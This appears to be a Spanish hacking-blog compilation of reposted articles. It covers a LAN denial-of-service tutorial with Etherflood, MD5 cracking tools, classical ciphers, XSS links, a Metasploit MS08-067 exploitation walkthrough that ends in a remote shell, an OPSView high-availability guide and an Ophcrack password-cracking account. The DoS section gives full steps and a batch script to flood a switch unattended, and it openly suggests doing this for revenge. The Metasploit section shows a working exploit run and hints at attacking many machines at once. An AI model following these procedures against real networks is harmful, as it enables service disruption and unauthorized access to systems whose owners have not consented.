D.O.S ( Denial Of Service) a redes Lan

Excelente tuto , solo falta probarlo y agradecerle al autor :D

------------------------------------------------------------------------------------------------------------------------------------------

¡Saludos!, Hoy quiero explicarles otro Ataque de tipo “Denegación de Servicio” (D.O.S.), Si bien, ya he explicado en qué consisten los ataques D.O.S, Aunque les debo un post para tocarlos “más a fondo”.

El ataque de hoy funciona en sistemas Win2000, WinXP y Win2003, y es algo destructivo , (como todos los ataques D.O.S.), pero éste tiene algo en particular, y es que no hay (ó por lo menos no conozco) defensa posible contra él (Si conoces alguna por favor infórmame al respecto), Una vez que empezó, nadie lo detiene, veamos de qué hablo.

Éste tipo de ataque es bastante viejo y nada “ético”, era usado para colapsar el Switch de una Red con direcciones aleatorias Ethernet, y esto causa que algunos Switches empiecen a enviar el tráfico de paquetes a todos los puertos de la LAN, Es decir, hacemos que el Switch funcione como un Hub, para poder nosotros aprovecharnos de esa y Sniffar la Red.

NO voy a enseñar en éste post a cómo Sniffar, eso tocará después, simplemente quiero mostrarles lo fácil que es “Denegarle el servicio” de Internet a una Red Ethernet.

Bien, para colapsar el Switch, necesitaremos un programa llamado Etherflood, “Ether” viene de “Ethernet” y “Flood” de “Inundación”, y lo podemos conseguir directamente aquí

Bien, para lograr que nuestro “Monstrico” funcione, tenemos que agregarle un Driver a la máquina que Infectaremos (Ojo nada permanente, nosotros sabremos parar “la infección” perfectamente), para que ésta ataque al resto de la red, les enseñaré a configurarlo:
Al descomprimirnos Etherflood, tendremos 3 archivos, los cuales son:
1 archivo .sys Archivo de sistema.
1 archivo .exe Nuestro monstruo 8) .
1 archivo .inf el Driver. Bien, instalemos el Driver, para eso vayamos al Panel de control y de ahí nos vamos a “Conexiones de red”, como esto ataca redes Ethernet, seleccionamos “Conexión de área local”, le damos clic secundario y clickeamos sobre Propiedades, justo como en la imagen:

En las propiedades de conexión de área local, clickeamos sobre el botón “Instalar”, en la ventana que nos saldrá, seleccionamos “Protocolo” y clickeamos en “Agregar”:
Ahora saldrá otra ventana llamada “Seleccionar el protocolo de red”, ahí clickeamos sobre “Utilizar disco”, esto a su vez nos llevará a otra ventana en la cual vamos a clickear sobre el botón “Examinar..” buscamos el directorio donde descomprimimos a Etherflood y ahí seleccionamos el Driver llamado “EthDrv.inf” listo, le damos a “Aceptar” a todo y cerramos las “Propiedades de conexión de área local” y estamos listos para atacar.

Etherflood funciona bajo Shells, así que abrimos una y nos dirigimos hacia donde está nuestro programa, y una vez ahí escribimos:

C:\Etherflood\>etherflood

Y nos saldrá lo siguiente:
Nos está pidiendo la autorización para el ataque , es decir, indicarle nuestra tarjeta de red, escribimos lo siguiente:

C:\Etherflood\>1

Pulsamos Enter, y empezará el desastre, la inundación y el colapso del Switch de la red .

Ningún ordenador conectado al Switch podrá acceder a servicios de red mientras nosotros estemos atacando, pero ¡Espera! Hay algo que canta, el Mismo Switch, ¿Alguna vez has visto un arbolito de Navidad con las luces encendidas al ritmo de la música de “I wish you a merry christmas”?, bueno, exactamente lo mismo pasará pero los LEDs del Switch bailarán al ritmo del la inundación de direcciones Ethernet :lol: :lol: , si el Administrador ó cualquier persona pasa cerca, lo más seguro es que se den cuenta, pero igual no sabrán qué está pasando ni qué ordenador está atacando :shock: , así hemos provocado un Denial Of Service.

Esto serviría de venganza, podríamos programar el Administrador de tareas de Windows para que a una hora determinada inunde el Switch de la red, ó bien con el comando AT de Windows, ó agregar un nuevo valor en el Registro :badgrin: , pero recuerden, La idea no es dañar sino aprender.

¿Ejecutarlo sin intervención Humana?

Claro que es posible, aquí les dejo un Script Batch para eso, para que "A tal hora" un programa por ahí llamado Etherflood se ejecute sin necesidad de alguien que le indique el parámetro "1".

Cita:

@echo off @echo 1 | C:\Etherflood\etherflood.exe

¿Para parar el ataque?
¡Hombre! Sólo cierra la shell que está atacando ó presiona ctrl. + C, ó si la ejecutaste en modo oculto, termina el proceso por Taskkill.

Publicado por villatux

FUENTE ORIGINAL:

http://villatux.blogspot.com/2008/06/dos-denial-of-service-redes-lan.html

Como crear claves MD5 y con que crackearlas

Hola,
bueno, primero que nada, ¿que es un hash md5??

Es un algoritmo de reduccion criptografico de 128 bits que se traduce en 32 caracteres hexadecimales (acrónimo de Message-Digest Algorithm 5, Algoritmo de Resumen del Mensaje 5)

Primero vamos a crear una clave encritada en md5 para luego crackearla y ver el resultado, ya que no es permitido utilizar tecnicas impropias que invadan la privacidad de algun usuario web .. XD

Para crear el codigo utilizmos un archivo lamado md5.php que contiene el siguiente codigo:

$cadena=“ villatux” ;
$texto_codificado=md5($cadena);
print “ $texto_modificado” ;
?>

ahora en el navegador, escribimos : "http:// localhost/md5.php" (sin comillas), esto nos mostrara el siguiente resultado:

6d887a5c677e2c9163b7e0536ef442ab

Para crackear este codigo y "saber" cual es la contraseña utilizaremos nuestro crackeador de md5 preferido, solo hay que introducir el hash a crackear y dependiendo de la complejidad de la contraseña encriptada y el crackeador que utilicen sera el tiempo en lograr crackearlo. Para una contraseña de 4 dijitos en Alfa tarda masomenos unos 3 segundos en crackear la contraseña... XD

acontinuacion les expongo algunos crackeadores y sus paginas de descarga:

John The ripper: http://www.openwall.com/john/

THC Hydra: http://www.thc.org/thc-hydra/

Aircrack: http://www.aircrack-ng.org/

Cain & Abel: http://www.oxid.it/cain.html

L0phtcrack : http://ophcrack.sourceforge.net/

RainbowCrack: http://www.antsight.com/zsl/rainbowcrack/

Salu2!

Publicado por villatux

FUENTE ORIGINAL :

http://villatux.blogspot.com/2007/08/como-crear-claves-md5-y-con-que.html

Cifras hebraicas: Atbash, Albam y Atbah

De ahora en adelante hare mucho enfasis en este nuevo blog colombiano que encontre, me parece excelente la informacion y sobre toda la calidad , espero la sepan aprovechar como yo y sobre todo gracias a ellos por la informacion

---------------------------------------------------------------------------------------------------

Atbash: Es un cifrado de sustitución simple para el alfabeto hebreo. Consiste en sustituir la primera letra por la última, la segunda por la penúltima, la tercera por la antepenúltima, hasta darle vuelta total al abecedario.
El esquema de cifrado es el siguiente: Se tiene el texto plano, para cifrar se debe hacer la sustitución correspondiente indicada en la siguiente tabla:

Texto en plano

A

B

C

D

E

F

G

H

I

J

K

L

M

N

O

P

Q

R

S

T

U

V

W

X

Y

Z

Texto cifrado

Z

Y

X

W

V

U

T

S

R

Q

P

O

N

M

L

K

J

I

H

G

F

E

D

C

B

A

atbash => zgyzhs

Albam: Consiste en rotar el alfabeto trece posiciones a la derecha. Es también conocido como ROT13 (Nombre dado por los usuarios de Usenet)
Se sigue al igual que el Atbash, un esquema de cifrado de sustitución simple.

Texto en plano

A

B

C

D

E

F

G

H

I

J

K

L

M

N

O

P

Q

R

S

T

U

V

W

X

Y

Z

Texto cifrado

N

O

P

Q

R

S

T

U

V

W

X

Y

Z

A

B

C

D

E

F

G

H

I

J

K

L

M

albam => nyonz

Atbah: Es muy similar a los dos anteriores cifrados. Se usa la siguiente tabla

Texto en plano

A

B

C

D

E

F

G

H

I

J

K

L

M

N

O

P

Q

R

S

T

U

V

W

X

Y

Z

Texto cifrado

I

H

G

F

N

D

C

B

A

R

Q

P

O

E

M

L

K

J

Z

Y

X

W

V

U

T

S

atbah => iyhib

Estos tres mecanismos de cifrado, tienen una seguridad criptográfica muy baja, debido a que si aplicamos el algoritmo para cifrar un texto a un texto cifrado, el resultado será nuestro texto en plano. Es lo mismo que decir f(plano) = cifrado, f(cifrado) = plano

Con esta publicación doy paso a inaugurar la nueva herramienta online, la cual estará encargada de cifrar y descifrar utilizando varios métodos clásicos. La herramienta hoy solo tiene para cifrar y descifrar estas tres cifras hebreicas, pero al transcurso del año quedará una herramienta completa.
El ingreso a la herramienta, es por medio del panel derecho de la web, en la sección “Herramientas Online”. Allí también se encuentran herramientas como el generador de hash, que permite cifrar textos en diferentes funciones de hash (como mdx, shax, havalx, ripemdx, ntlm, mysql323, entre muchos otros); Al igual que el cifrador y descifrador de hashes VNC y el visor de cabeceras del navegador.
Cryptos
Generador de Hashes
VNC Decipher
Visor HTTP

Y me despido con esta frase:”Sloz Oxefm”

FUENTE ORIGINAL:http://www.sinfocol.org/2008/10/cifras-hebraicas-atbash-albam-y-atbah/

Muchas gracias y saludos especiales

documentacion xss

http://foro.elhacker.net/tutoriales_documentacion/los_poderes_secretos_de_xss_cross_site_scripting-t98324.0.html

http://es.wikipedia.org/wiki/Cross_Site_Scripting

http://spiderven.blogspot.com/2008/09/ataques-xss_23.html

https://www.underground.org.mx/index.php?action=printpage;topic=18089.0

http://comunidad.dragonjar.org/index.php?action=printpage;topic=1810.0

Metasploit: Uso básico y ejecución de exploits

ANUNCIO:

Hace poco publique un articulo sobre como entrar a una pc por medio de explotacion del servicio dcom de modo guiado por medio de metasploit, bueno para los que no entendieron posteo esta guia la cual es algo mas general :D

-------------------------------------------------------------------------------------------------

Una vez que hemos hablado sobre Metasploit y lo hemos instalado y actualizado llega el momento de ponerlo en funcionamiento. Hoy vamos a ver el manejo básico de la herramienta y de paso lanzaremos un exploit contra una maquina vulnerable, todo en entorno de laboratorio.

::Manejo Basico::
Para todas las pruebas vamos a utilizar la consola mfs. Desde Unix accedemos a ella mediante el binario “mfsconsole“. Desde Windows podemos acceder mediante la GUI, y una vez abierta haciendo click en Window->Console o con la combinación de teclas Ctrl+o.
Lo primero que vemos en la consola es un resumen de los exploits, payloads, encoders, etc cargados en el entorno:

____________
<>
————
\ ,__,
\ (oo)____
(__) )\
||–|| *

=[ msf v3.2-release
+ -- --=[ 262 exploits - 117 payloads
+ -- --=[ 17 encoders - 6 nops
=[ 46 aux

El primer comando que deberíamos probar es "help", que nos muestra los comandos disponibles y una breve explicación de los mismos:

Por otro lado tenemos un sistema víctima a auditar. En nuestro caso se trata de un sistema virtual Windows XP que me ha proporcionado spanic. Dicho sistema es vulnerable al "Microsoft Security Bulletin MS08-067 – Critical", sobre el que ya hablé en su dia.
Nos hemos saltado un paso importante: identificar el sistema vulnerable. Habitualmente nadie usa Metasploit para ello aunque como veremos en futuros post es posible realizarlo desde él o importando directamente informes de aplicaciones como Nessus.
Para el caso que nos ocupa simplemente tenemos una máquina vulnerable en la IP 192.168.60.130 y nuestra máquina con el Metasploit instalado y la consola esperando a que explotemos la vulnerabilidad de la víctima.

Volvemos pues a la consola mfs. Es posible navegar los exploits, encoders, payloads, etc con el comando "show". Por ejemplo para listar los exploits disponibles utilizaremos el comando "show exploits", que nos da el siguiente resultado (recortado para un mejor entendimiento):

....
windows/smb/ms06_066_nwwks Microsoft Services MS06-066 nwwks.dll
windows/smb/ms08_067_netapi Microsoft Server Service Relative Path Stack Corruption
windows/smb/msdns_zonename Microsoft DNS RPC Service extractQuotedChar() Overflow (SMB)
....

Como podemos apreciar el framework tiene disponible un exploit para la vulnerabilidad que queremos explotar (ms08_067_netapi).
Para situarnos en el exploit que queremos lanzar utilizamos el comando "use". Por ejemplo nosotros introduciremos el comando "use windows/smb/ms08_067_netapi". Como vemos el promt ha cambiado:

msf > use windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) >

Ahora necesitamos saber qué opciones permite este exploit y cómo configurarlo, seleccionar el objetivo, etc. En Metasploit esto se realiza mediante la modificación de variables asociadas a cada exploit. Para ver que opciones nos permite configurar un exploit determinado utilizamos el comando "info" (recortado para un mejor entendimiento):

msf exploit(ms08_067_netapi) > info

Name: Microsoft Server Service Relative Path Stack Corruption
Version: 5888
Platform: Windows
Privileged: Yes
License: Metasploit Framework License (BSD)

Provided by:
hdm
Brett Moore

Available targets:
Id Name
-- ----
0 Automatic Targeting
1 Windows 2000 Universal
2 Windows XP SP0/SP1 Universal
3 Windows XP SP2 English (NX)
4 Windows XP SP3 English (NX)
.......

Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST yes The target address
RPORT 445 yes Set the SMB service port
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)

Payload information:
Space: 400
Avoid: 8 characters

Description:
.....

References:
.....

Como podemos apreciar tenemos disponibles opciones para seleccionar el objetivo (RHOST), el puerto de smb (RPORT) y el pipe utilizado (SMBPIPE) y se nos informa de si son necesarios u opcionales. También hay abundante información acerca de sobre qué sistemas está probado el exploit, descripción del mismo, referencias, etc.

Para aplicar las opciones utilizamos el comando "set". Este comando recibe como primer parametro la opción y como segundo el valor a aplicar, separados por espacios. Esto quiere decir que si el valor de una variable tiene espacios debemos introducirlo entre comillas dobles. En nuestro caso estableceríamos el objetivo, puerto y pipe con la siguiente secuencia:

msf exploit(ms08_067_netapi) > set RHOST 192.168.60.130
RHOST => 192.168.60.130
msf exploit(ms08_067_netapi) > set RPORT 445
RPORT => 445
msf exploit(ms08_067_netapi) > set SMBPIPE BROWSER
SMBPIPE => BROWSER

Ahora vamos a configurar el Payload. Vamos a utilizar uno sencillo que sirve para darnos acceso a una linea de comandos en la máquina víctima, si bien hay algunos muy elaborados como por ejemplo la inyección de dll's para conectarnos a la víctima por VNC.
Para ver los payloads disponibles tenemos la opción "show payloads", para elegir el que queremos usamos el comando "set". En nuestro caso:

msf exploit(ms08_067_netapi) > set payload windows/shell_bind_tcp
payload => windows/shell_bind_tcp

Ahora con el comando "show options" podemos comprobar que los datos se han introducido correctamente:

msf exploit(ms08_067_netapi) > show options

Module options:

Name Current Setting Required Description
---- --------------- -------- -----------
RHOST 192.168.60.130 yes The target address
RPORT 445 yes Set the SMB service port
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)

Payload options (windows/shell_bind_tcp):

Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique: seh, thread, process
LPORT 4444 yes The local port
RHOST 192.168.60.130 no The target address

Exploit target:

Id Name
-- ----
0 Automatic Targeting

En este caso solo tenemos un sistema víctima posible (con ID 0), en caso de tener varios elegiríamos con "set target N".
Asímismo algunos exploits permiten la comprobación de la vulnerabilidad sin ejecutarla mediante el comando "check". Este no es el caso por lo que solo nos queda lanzar el exploit, para ello utilizamos el comando "exploit":

msf exploit(ms08_067_netapi) > exploit
[*] Started bind handler
[*] Automatically detecting the target…
[*] Fingerprint: Windows XP Service Pack 2 - lang:Spanish
[*] Selected Target: Windows XP SP2 Spanish (NX)
[*] Triggering the vulnerability…
[*] Command shell session 1 opened (192.168.60.1:5953 -> 192.168.60.130:4444)

Microsoft Windows XP [Versi?n 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

El sistema es nuestro

Lo comprobamos ejecutando comandos sobre la shell que acabamos de obtener:

C:\WINDOWS\system32>ipconfig /all
ipconfig /all

Configuraci?n IP de Windows

Nombre del host . . . . . . . . . : spanic-08bcbab7
Sufijo DNS principal . . . . . . :
Tipo de nodo. . . . . . . . . . . : mixto
Enrutamiento habilitado. . . . . .: No
Proxy WINS habilitado. . . . . : No
Lista de b?squeda de sufijo DNS: localdomain

Adaptador Ethernet Conexi?n de ?rea local :

Sufijo de conexi?n espec?fica DNS : localdomain
Descripci?n. . . . . . . . . . . : VMware Accelerated AMD PCNet Adapter
Direcci?n f?sica. . . . . . . . . : 00-0C-29-32-66-B3
DHCP habilitado. . . . . . . . . : No
Autoconfiguraci?n habilitada. . . : S?
Direcci?n IP. . . . . . . . . . . : 192.168.60.130
M?scara de subred . . . . . . . . : 255.255.255.0
Puerta de enlace predeterminada : 192.168.60.2
Servidor DHCP . . . . . . . . . . : 192.168.60.254
Servidores DNS . . . . . . . . . .: 192.168.60.2
Servidor WINS principal . . . . . : 192.168.60.2
Concesi?n obtenida . . . . . . . : mi?rcoles, 11 de febrero de 2009 11:49:35
Concesi?n expira . . . . . . . . .: mi?rcoles, 11 de febrero de 2009 12:19:35

C:\WINDOWS\system32>
A destacar que hemos introducido las opciones para un objetivo concreto pero ¿y si tengo una lista de 50 pc’s con la misma vulnerabilidad y quiero explotarlos todos? ¿tengo que ir uno por uno ? Evidentemente la respuesta es no. En Metasploit podemos definir variables globales.
Para volver a la pantalla inicial tenemos el comando “back“. Una vez en la pantalla inicial podemos definir variables globales con el comando “setg“. Si por ejemplo queremos definir globalmente que el payload sea el que utilizamos en esta ocasión utilizamos:

msf > setg payload windows/shell_bind_tcp
payload => windows/shell_bind_tcp

Después con “setg” comprobamos qué variables globales tenemos definidas con sus correspondientes valores:

msf > setg

Global
======

Name Value
—- —–
payload windows/shell_bind_tcp

Si queremos guardar nuestras variables globales para que se queden incluso después de cerrar el Metasploit usamos el comando “save“:

msf > save
Saved configuration to: C:\Documents and Settings\dmedianero\Datos de programa/.msf3/config

Como podemos ver el framework nos informa de dónde queda guardada dicha configuración, es un fichero de texto en formato simple.
Hasta aqui lo que probablemente todos los que usáis Metasploit hayáis utilizado habitualmente, a partir de ahora intentaré poco a poco escribir sobre usos menos comunes y muy utiles como el manejo de jobs, uso otros payloads, BBDD, etc.

Fuente:http://dmedianero.byethost15.com/blog/2009/02/metasploit-uso-basico-y-ejecucion-de-exploits/

Erase una vez en el jardin del eden

Estaba todo muy tranquilo en el jardin del eden. Pero eva queria probar cosas nuevas… y asi les fue:

Fuente:http://chistesgeeks.com/

Instalación de OPSView en Alta Disponibilidad

OPSView es un sistema de monitorización libre. El siguiente tutorial cubre la instalación de dos servidores maestros de monitorización en alta disponibilidad. Está realizado sobre Debian Linux y aunque hay tutoriales y documentación en la página oficial, si queréis montar dos Debian maestros en HA no os recomiendo seguir la guia oficial al pie de la letra (yo ya lo hize).
La guía mostrada a continuación no es enteramente mía. Está basada en documentación oficial y en trozos de las páginas que menciono en el apartado referencias. Además no habría podido realizarla sin la ayuda de mis compañeros adolfop, 4lv3rn3, spanic y vege10n. Ahí vamos:

::Instalación SSOO::

Instalamos Debian en ambos nodos, solo el sistema base.
Para el particionado reservamos dos particiones para el HA sin montar, una para los metadatos(con 128 MB basta) la otra para var2.
Una vez instalado añadimos las siguientes lineas al fichero /etc/apt/sources.list

—-
deb http://ftp.es.debian.org/debian/ etch non-free
deb-src http://ftp.es.debian.org/debian/ etch non-free
deb http://www.backports.org/debian etch-backports main contrib non-free
deb http://apt.opsview.org/debian etch main
deb http://ftp.debian.org/debian etch non-free
—-

Después de esto al hacer “aptitude update” obtendremos errores de certificados, se solucionan importándolos con los siguienetes
comandos:

gpg –keyserver subkeys.pgp.net –recv-key XXXXXXXX
gpg –export –armor XXXXXXXX | apt-key add -

Donde XXXXXXXX son los últimos 8 dígitos numéricos del cedrtificado y se obtienen del error al hacer el “aptitude update”
COnfiguramos para que nodo1 y nodo2 tengan IP’s estáticas y completamos el fichero /etc/hosts para que resuelvan uno contra el otro.

:: Instalación Software ::

Instalamos el software necesario mediante aptitude:

aptitude install heartbeat
aptitude install drbd8-source
aptitude install drbd8-utils
aptitude install ssh
aptitude install opsview

Creamos el módulo para el drbd8:

module-assistant auto-install drbd8

:: Configuración de la HA ::

En ambas máquinas sustituimos el fichero /etc/drbd8.conf por este:

—-
global {
usage-count no;
}
common {
}
resource “r0″ { # r0 es el nombre del recurso
protocol C;
startup {
wfc-timeout 80;
degr-wfc-timeout 120;
}
disk {
on-io-error detach;
}
net {
}
syncer { rate 10M; }
on nodo1 { # nodo1
device /dev/drbd0; # dispositivo HA
disk /dev/sda6; # partición que compartirán los nodos en HA (var2)
address X.X.X.X:7780; # IP y puerto que se utilizará para balancear
meta-disk /dev/sda8[0]; # partición donde se guardan los metadatos
}
on nodo2 { # idéntico para el nodo2
device /dev/drbd0;
disk /dev/sda6;
address X.X.X.X:7780;
meta-disk /dev/sda8[0];
}
}
—-

Para ajustar los permisos ejecutamos los siguientes comandos:

chgrp haclient /sbin/drbdsetup
chmod o-x /sbin/drbdsetup
chmod u+s /sbin/drbdsetup

chgrp haclient /sbin/drbdmeta
chmod o-x /sbin/drbdmeta
chmod u+s /sbin/drbdmeta

En ambos nodos creamos el dispositivo para el recurso:

drbdadm create-md r0

Acto seguido iniciamos el servicio:

/etc/init.d/drbd8 start

Ahora en el nodo que inicialmente será el maestro (nodo1) ejecutamos:

drbdadm — –overwrite-data-of-peer primary r0
mkfs -t ext3 /dev/drbd0
mkdir /var2
mount /dev/drbd0 /var2

En el nodo2 creamos el directorio var2 (mkdir /var2).

Para iniciar la sincronización entre ambos nodos introducimos el siguiente comando en el nodo primario (nodo1):

drbdadm — connect all

En ambos nodos eliminamos el incio automático del software que será balanceado, ya que éste será iniciado mediante HA:

update-rc.d -f opsview remove
update-rc.d -f opsview-web remove
update-rc.d -f mysql remove
update-rc.d -f apache2 remove
update-rc.d -f opsview-agent remove

En ambos nodos reemplazados el fichero /etc/ha.d/ha.cf por el siguiente:

—-
debugfile /var/log/ha-debug
logfile /var/log/ha-log
keepalive 2
deadtime 30
warntime 10
initdead 120
auto_failback off
bcast eth0
# This is a ping test in our network to check which server can ping it
ping X.X.X.X # IP virtual a la que los clientes deberán dirigirse para utilizar los servicios ofrecidos en HA
node nodo1
node nodo2
respawn hacluster /usr/lib/heartbeat/ipfail
apiauth ipfail gid=haclient uid=hacluster
—-

Em ambos nodos reemplazamos el fichero /etc/ha.d/haresources por el siguiente(idéntico en los dos nodos):

—-
nodo1primario drbddisk::r0 Filesystem::/dev/drbd0::/var2::ext3 10.10.10.120 mysql opsview opsview-web apache2
# nodo que actua de primario, recurso, filesystem, punto de montaje, IP virtual, servicios en HA
—-

En ambos nodos reemplazamos el fichero /etc/ha.d/authkeys por el siguiente:

—-
auth 1
1 sha1 MySecret
—-

Modificamos los permisos del fichero /etc/ha.d/authkeys:

chmod 600 /etc/ha.d/authkeys

Una vez sincronizados deberemos preparar /var em ambos nodos para que los datos a compartir por los servidores estén en la partición en HA.
Para ello vamos a tomar el recurso compartido en el nodo2, realizaremos la preparación, acto seguido repetir los pasos, tomando el recurso
el nodo1 y haciendo la misma preparación:

En el nodo1 “soltamos” el recurso:

umount /var2
drbdadm secondary r0

En el nodo2 “cogemos” el recurso:

drbdadm primary r0
mount /dev/drbd0 /var2

A continuación vamos a preparar /var y /var2. La idea es que los recursos que se necesitan en HA estén realmente en /var2, aunque la máquina
a nivel local los trate como si estuvieran en /var.

cd /usr/local/
tar cvzf nagios.tar.gz nagios
mv nagios.tar.gz /var2
rm -r nagios
cd /var2
tar xvzf nagios.tar.gz /var2
ln -s /var2/nagios /usr/local/nagios
cd /usr/local/
tar cvzf opsview-web.tar.gz opsview-web
mv opsview-web.tar.gz /var2
rm -r opsview-web
cd /var2
tar xvzf opsview-web.tar.gz /var2
ln -s /var2/opsview-web /usr/local/opsview-web
cd /var/lib/mysql
tar cvzf mysql.tar.gz mysql
mv mysql.tar.gz /var2
rm -r mysql
cd /var2
tar xvzf mysql.tar.gz /var2
ln -s /var2/mysql/ /var/lib/mysql/mysql

Reemplazamos los agentes NRPE de Nagios:

apt-get install nagios-nrpe-server nagios-plugins-basic
rm /etc/nagios/nrpe.cfg
cp /var2/nagios/etc/nrpe.cfg /etc/nagios/nrpe.cfg

Editamos el fichero /etc/nagios/nrpe.cfg y lo modificamos para cambiar las rutas “/usr/local/nagios/libexec” por “/usr/lib/nagios/plugins”
Reiniciamos el servicio:

/etc/init.d/nagios-nrpe-server restart

Tras realizar el último paso en el nodo1 podemos reiniciar las máquinas y dispondremos de OPSView en HA.
Para acceder al servicio los clientes deben dirigirse a la IP virtual, en este caso http://X.X.X.X:3000

:: NOTAS ::

Un error comun a la hora de sincronizar con drbd es el “Repair Split-Brain detected, dropping connection!”

Para solucionarlo debemos seguir los siguientes pasos:
Paramos el heartbet en ambos nodos.
En el secundario ejecutamos el siguiente comando:

drbdadm — –discard-my-data connect r0

En el primario ejecutamos el siguiente comando:

drbdadm connect r0

Si aún con ello no levanta probamos el siguiente comando en el primario:

drbdadm primary r0

:: Referencias ::

http://docs.opsview.org/doku.php?id=opsview2.14:hamaster-debian-howto
http://wiki.centos.org/HowTos/Ha-Drbd
http://www.estrellateyarde.es/discover/drbd-en-linux
http://liyuangarcia.blogspot.com/2007/11/cluster-de-alta-disponibilidad-sobre.html
http://gobok.serveblog.net/system-admins/howto-repair-split-brain-detected-dropping-connection/

FUENTE:

http://dmedianero.byethost15.com/blog/category/detectores-de-intrusos/

¿Crackear un password en 5 minutos? ¡Funciona!

Les voy a contar una historia.

Prologo: el descubrimiento

Todo empezó hace unos días, leyendo el siguiente post: “How to Crack a Window’s Password in 5 Minutes” (en español, Cómo crackear el password de Windows en 5 minutos). El post decía, entre otras cosas:

“Sin importar cuál sea la razón para necesitarlo, encontrar la contraseña de Windows se generalmente simple, y puede ser realizado en un periodo corto de tiempo.”

“Para encontrar la contraseña de Windows, usted necesitará un programa llamado Ophcrack. Es completamente gratuito y funciona muy bien”

“… el Live CD iniciará las tablas rainbow y automaticamente comenzará a trabajar por la contraseña. Para la mayoría de las contraseñas de usuarios, solo tomará unos segundos crackearlas. Para contraseñas alfanuméricas más extensas, tomrá unos minutos, pero es la exepción, no la regla.”

“Una vez que encuentre la contraseña, anotala por ahí, quitá el CD y reiniciá el sistema. Ingresá la contraseña en el login y luego hace lo que quieras.”

“Nota: el sentido común indica que esto solo debe ser utilizado en computadoras donde usted está autorizado a acceder. Si utiliza esto para computadoras no autorizadas, eso es ilegal. Este artículo es solo confines informativos.”

Nota de mundobinario: hago extensiva la última nota a este post.

Primer estadio: escepticismo

La realidad es que luego de leer el artículo, pensé que esto se trataba de un titular, no digo amarillista, pero sí ventajoso. Supuse que el sistema funcionaría con contraseñas simples pero que ante contraseñas complejas (como la mía) esto no podía funcionar. Mis aprendizajes sobre ataques de fuerza bruta me hacían comprender que, a mayor complejidad, y dada la función exponencial, llega un momento en que el tiempo para calcular una contraseña va más allá de lo útil. La verdad, descreí…

Segundo estadio: las pruebas

De todas formas, más allá de mi opinión, creí que valía la pena realizar las pruebas pertinentes. Descargué el LiveCD y lo probé en una máquina virtual con Windows XP. El CD bootea y arranca a trabajar. El resultado, en la imagen a continuación:

Como podrán observar, ofusqué cierta información ya que la password que efectivamente el sistema encontró, es una que utilizo normalmente. Observar que:

• el primer recuadro azul marca la contraseña del usuario “Administrador”. El tiempo que demoró en encontrar la contraseña fue de aproximadamente 10 minutos.
• el segundo recuadro marca la contraseña (vacía) de un usuario que tengo configurado así. El tiempo que demoró fue unos pocos segundos (literalmente).
• abajo a la derecha se ve el tiempo total de finalizar todo el proceso aunque, como ya mencioné en el ítem 1, la password de administrador ya figuraba desde el minuto diez.

Finalmente hice dos pruebas más:

1. Modifiqué la contraseña a “123456″ y esta fue encontrada en un minto y medio (ver imágen).
2. Modifiqué la contraseña por una más compleja que la mía aún: “UnWi-*%$Np98ww”. La misma no fue encontradada luego de media hora (ver imágen).

Por lo tanto, pude concluir que este sistema de una u otra forma estaba utilizando algún método mejor que el clásico de fuerza bruta, que podía obtener contraseñas complejas… pero no tanto.

De todas formas estaba anonadado. Toda mi teoría sobre seguridad en contraseñas destruida en diez minutos. ¡Qué contraseña iba a utilizar ahora que la mía era fácil de obtener!

Tercer estadio: la comprensión

Nota de mundobinario: todos los méritos de esta sección para este post.

Definitivamente las pruebas me superaron, asumí mi derrota y pensé: “no hay derrota si hay aprendizaje”. Por lo tanto, decidí leer un poco a ver por qué este método funcionaba.

Como primer conclusión estaba claro que, como ya mencioné, esto no utilizaba un ataque de fuerza bruta clásico; y comprendí que justamente esto de las tablas rainbow no se trataba de este tipo de técnicas. Luego decidí ver qué decía el sitio oficial, que describe que se utilizan ataques de fuerza bruta para contraseñas simples y tablas rainbow para complejas. Incluso se pueden descargar las tablas que son muy pesadas (¡muy! desde 500 Mb. hasta varios Gigas).

¿Qué son las Rainbow Tables?

Cuando un usuario asigna su contraseña, el sistema operativo necesita guardar esa contraseña. Para no hacerlo en texto plano (sería muy simple encontrarla), lo que hace es aplicar una función Hash y almacenar el resultado de dicha función en un archivo (en el caso de Windows en C:\Windows\System32\config\SAM).

Una función Hash es una función que devuelve un valor casi único por cualquier cadena de texto (o incluso archivos, directorios, etc.). Es decir, si yo le aplico un Hash MD5 (un tipo de Hash) a la palabra “Sebastián”, el resultado será “c2d628ba98ed491776c9335e988e2e3b“. Y si hago lo mismo con “unmundobinario.com”, el resultado será “373e838e5050faca627b0433768aedef“. Claramente el resultado de una función Hash dista bastante de almacenar el texto plano.

Sin embargo, las funciones Hash tienen un inconveniente. Siempre que yo ponga la misma cadena obtendré el mismo resultado. Y aquí aparecen las tablas rainbow.

Basicamente a alguien se le ocurrió lo siguiente: no necesito hacer un ataque de fuerza bruta (prueba-error) para obtener la contraseña. Si conozco la función Hash, conozco la contraseña.

Una tabla rainbow es una colección enorme de Hashes con los algoritmos más conocidos. De esta forma, lo que antes era un ataque de fuerza bruta ahora es una búsqueda en unas tablas gigantes (literalmente). Obviamente el gran problema de estas técnicas es el espacio. De hecho, aunque aquí fue explicado de forma resumida, se utilizan funciones de reducción para no tener que ocupar tanto espacio de almacenamiento.

Entendido el método (¿entendido?) se entiende por qué en las pruebas que hice no se encontró en un caso el password: el motivo fue que no estaba cargada la función HASH de dicho password en la tabla de Hashes utilizada por la aplicación.

Nota de mundobinario: además del post citado en este estadio, pueden ver más información aún (en inglés) aquí.

Cuarto estadio: la conclusión

Cabe mencionar que, según el post que me ayudó a comprender esto, existen dos alternativas para poder segurizar las contraseñas almacenadas con Hash:

1. Utilizar espacios en blanco en las contraseñas. Esto lo probé con una contraseña muy simple (”esp acio”) y el programa no pudo encontrar la contraseña.
2. Añadir variables aleatorias en la generación del Hash. Es decir, que si pongo dos veces de contraseña Sebastián, obtener dos Hash válidos con una parte fija (siempre igual) y otra variable.

Luego de “experimento” podemos agregar que contraseñas MUY complejas también zafan (por ahora, y según las tablas que se utilicen) de este método.

Como conclusión, y en primer lugar está claro que todos los días se aprende algo nuevo.

Las técnicas de “hacking” están aprovechando los avances informáticos (y en materia de Inteligencia Artificial). Podrán observar que estas herramientas están al alcance de cualquiera asi que tengan cuidado a quién prestan su PC.

